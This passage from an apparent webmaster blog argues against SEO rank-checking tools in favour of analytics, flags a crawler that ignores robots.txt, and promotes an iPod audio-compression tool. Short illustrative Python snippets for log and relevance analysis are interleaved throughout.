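To make the relevance argument concrete, here's a toy illustration only; it is not how Google or any search engine actually scores links. A simple word-overlap (Jaccard) score between a post and a comment already separates Grandma's crochet post from a Viagra comment. The stop-word list and the three-letter minimum are arbitrary assumptions.

```python
import re

# Arbitrary example stop words; a real system would use a much larger list.
STOPWORDS = {"the", "a", "an", "and", "or", "of", "to", "in", "on", "for",
             "my", "your", "is", "it", "this", "with"}


def terms(text: str) -> set[str]:
    """Lowercased words of three or more letters, minus stop words."""
    words = re.findall(r"[a-z]+", text.lower())
    return {w for w in words if w not in STOPWORDS and len(w) > 2}


def overlap_score(post: str, comment: str) -> float:
    """Jaccard similarity of the two term sets: 0.0 = nothing shared, 1.0 = identical."""
    a, b = terms(post), terms(comment)
    if not a or not b:
        return 0.0
    return len(a & b) / len(a | b)
```

For a post like "New crochet pattern for a granny square blanket using soft cotton yarn", a comment asking about the yarn and blanket scores above zero while "Cheap Viagra and discount pharmacy pills online" scores exactly 0.0. It also shows the weakness described above: on a mixed-content page covering many topics, perfectly legitimate links would score low too.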

Page Position Checking SEO Tools Waste Time and Money

The SEO community is always promoting page position checking tools all over the place, but those tools are hardly useful and are just part of the harmful hype that constantly surrounds the SEO business. They burn up your money paying for crap that most people ultimately discard, waste time setting up the software for each site, and burn more time and bandwidth running them; worse yet, these tools are against the Google Webmaster Guidelines. Since most SEOs don't give a rat's ass about doing things that are against the Google Webmaster Guidelines until their sites get penalized in Google, we'll focus on why it's a waste of time and money.

Why would you possibly need a rank checker?

Customer wants a position report.
Keeping an eye on the competition's ranking.
Don't know how to interpret traffic analytics.
Because everyone else does it.

Customer wants a page position report

There must be a motivating factor driving all of this rank checking mania; we'll call it money, because it certainly isn't common sense. I've never hired an outside SEO, but I'll bet customers get charged extra for these silly reports to cover the cost of the software or service used to create them.

The customer probably didn't know he needed a position report until some SEO claimed "Top 10 position guaranteed!" or something equally silly, which put that thought in his head in the first place. Now that the customer has that idea about a single position, you need to either educate him about why it's garbage or spend time and money pounding the search engines running reports to put your money where your mouth is.

I would probably opt to educate the customer about what really matters, show increases in traffic and conversions, and skip right past the silly rank checking. If you want to spend money wisely, and help the customer spend it wisely as well, invest in really good analytics and skip rank checking entirely.

Unfortunately, we all know some customers will be fixated on ranking #1 for some term, won't see or appreciate the big picture of overall traffic improvements, and will have a single-minded focus on that one keyword. Those are customers I would walk away from, because if you fall anywhere short of that goal they'll never be happy, and misery flows downhill. Run, do not walk, away from this situation.

Keeping an eye on the competition's ranking.

Considering that the bulk of the traffic usually comes from fewer than 30 keyword phrases (OK, I just picked 30 as a random number for discussion; your mileage may vary), it's pretty easy to eyeball these phrases in the search engines every now and then just to get an idea of what the competitive landscape looks like. Spending tons of money on software just to track this competitive analysis is also silly, because you know for a fact that when you improve your traffic and conversions on certain terms you're taking them away from someone. Likewise, if you lose traffic and conversions on certain terms, you can typically assume someone is taking that traffic away from you, and you can easily eyeball that term in the search engine to see where it went.

Don't know how to interpret traffic analytics.

Anyone who has ever run a web site for any length of time will realize that everything you'll ever need to know can be found in your log file analysis. If you rank well for a keyword or phrase you'll get a lot of traffic on that term, and if you don't rank well, or at all, you won't get traffic for that term. It's pretty simple to figure out which terms rank, because anything that doesn't show up in your log files either doesn't rank or, if it does rank, doesn't drive traffic because people don't search for that phrase, so it's meaningless.

Learning how to properly understand the traffic to your site can seem a little overwhelming at first because not all traffic is good traffic. The easiest way to really understand where to focus your energy is tracking conversions to see which terms bring in the most customers that convert and then expand your search engine marketing around what I like to call "the phrase that pays".

Usually it's a lot of phrases but that's a different discussion for a different day.
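Finding "the phrase that pays" can be sketched as ranking phrases by conversions rather than by raw visits. This assumes each visit can already be tied to the search phrase that brought it and to whether it converted (how you do that depends on your analytics setup); `phrases_that_pay` is a hypothetical name.

```python
from collections import defaultdict
from collections.abc import Iterable


def phrases_that_pay(
    visits: Iterable[tuple[str, bool]],
) -> list[tuple[str, int, int, float]]:
    """visits: (search_phrase, converted) pairs.

    Returns (phrase, conversions, visits, conversion_rate) rows, sorted by
    conversions, then conversion rate, then phrase.
    """
    stats: dict[str, list[int]] = defaultdict(lambda: [0, 0])  # [visits, conversions]
    for phrase, converted in visits:
        stats[phrase][0] += 1
        if converted:
            stats[phrase][1] += 1
    rows = [(p, conv, n, conv / n) for p, (n, conv) in stats.items()]
    rows.sort(key=lambda r: (-r[1], -r[3], r[0]))
    return rows
```

Sorting on conversions first keeps a high-traffic phrase that never converts at the bottom, which is the whole point of focusing on conversions instead of traffic alone.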

I always recommend a combination of server-side and hosted analysis tools: you need something that can analyze your raw server log files, and it never hurts to use something free that's easy to install, like Google Analytics, especially if you're on a budget or not terribly technical. Additionally, consider looking into some of the information provided by Google Webmaster Tools.

The main difference between a JavaScript-based analytics tool like Google Analytics and server-side stats is that the JavaScript-based tools tend to show only real humans surfing the web. Most of the 'bots that crawl aren't JavaScript-capable, which is why you'll see a huge discrepancy between your raw server logs and analytics services. Don't forget that many surfers disable JavaScript or run ad blocking software, which may also block your analytics tracker for privacy reasons. Therefore, the truth about your traffic lies somewhere between the raw server logs and a hosted analytics service, but you usually can't go wrong basing decisions on the results of an analytics service.
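A crude way to see the bot side of that discrepancy in raw logs is to bucket hits by user agent. This sketch assumes you already have the user agent strings for a period; the hint words are an arbitrary example list, and real bot detection needs far more than substring matching (a screen shot bot posing as Firefox, like the one earlier on this page, sails right through).

```python
# Arbitrary example substrings that commonly appear in crawler user agents.
BOT_HINTS = ("bot", "crawler", "spider", "slurp", "nutch")


def is_probable_bot(user_agent: str) -> bool:
    """Naive check: empty user agents or ones containing a bot hint word."""
    ua = user_agent.lower()
    return not ua or any(hint in ua for hint in BOT_HINTS)


def split_hits(user_agents: list[str]) -> tuple[int, int]:
    """Return (likely_human_hits, likely_bot_hits) for a list of user agents."""
    bots = sum(1 for ua in user_agents if is_probable_bot(ua))
    return len(user_agents) - bots, bots
```

Even after this filter, the "human" count from raw logs will usually run higher than a JavaScript-based analytics report, for the reasons given above.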

Because everyone else does it.

That's not even a reason, that's an excuse.

This article wouldn't be complete if I didn't admit that once upon a time, a long time ago, even I fell for the page position tracking trap and did it for almost 6 months before I realized I was wasting my time. Worrying about minor fluctuations is silly, because the search engines are constantly in flux and your site may go up or down a little on various terms all the time; it's natural. However, if your site moves up or down a substantial amount on a term, your analytics will point this out just as well as the rank checker, so it's completely redundant, and doing the same job twice is obviously a waste of time and money.

That's why I abandoned checking my page positions years ago, increased my traffic more than I ever did looking at those silly reports, and both made and saved a lot of money in the process.

Summary

Skip the rank position checking except for manually eyeballing the search results every now and then for some top terms and invest heavily in analytics.

You'll be happier, you'll be focused on what really gets better results and you won't feel like a schmuck.

Wednesday, September 26, 2007

Cyberspider Crap-of-the-Day Bot Award

No clue what this spider does, as it only asked for my home page, but I know what it doesn't do: it doesn't ask for robots.txt.

Here's the 411 on this bad bot:

81.56.161.126 [veigy.globalitsolution.com.] requested 1 pages as "cyberspider"

These crappy crawlers just keep coming...
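Spotting crawlers like this one in your own logs can be sketched as finding IPs that fetched pages but never requested /robots.txt. This assumes the log is already parsed into `(ip, path)` pairs, and it isn't the author's bot blocker, just an illustration; `skipped_robots_txt` is a hypothetical name.

```python
from collections import defaultdict
from collections.abc import Iterable


def skipped_robots_txt(requests: Iterable[tuple[str, str]]) -> list[str]:
    """Return IPs that requested pages but never asked for /robots.txt."""
    fetched: dict[str, set[str]] = defaultdict(set)
    for ip, path in requests:
        # Ignore any query string so "/robots.txt?x=1" still counts.
        fetched[ip].add(path.split("?", 1)[0])
    return sorted(ip for ip, paths in fetched.items() if "/robots.txt" not in paths)
```

Ordinary browsers never ask for robots.txt either, so in practice you'd only apply this to traffic whose user agent already claims to be a crawler, like "cyberspider".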

Double iPod Storage with iDoubler from Analog Magic

I found out that an old friend of mine, a really smart guy, wrote some cool software to compress music files on an iPod. His iPod software tool, called iDoubler, uses some real high-tech audio analysis processing to cut the size of MP3 and other files in half without compromising quality, thus doubling the amount of storage on your iPod or other music player.

Most of the music stored on my Zen is in MP3 format so even if I didn't put twice as many songs on the Zen, using iDoubler would cut the upload time in half.

Anyway, I just thought it would be worth mentioning iDoubler for those of you out there who, like me, still have a music player with 5GB or less, so we can jam even more into our trusty old music players until prices and sizes drop on those fancy 30GB devices.